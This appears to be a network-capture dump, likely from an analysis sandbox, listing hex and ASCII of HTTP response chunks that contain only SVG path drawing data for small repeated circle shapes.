                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7701INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7717INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                  Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7733INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                  Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7749INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7765INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7781INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7797INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                  Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7813INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                  Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7829INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7845INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                  Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7861INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7877INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                  Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7893INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                  Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7909INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                  Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7925INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                  Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7941INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                  Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7957INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                  Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
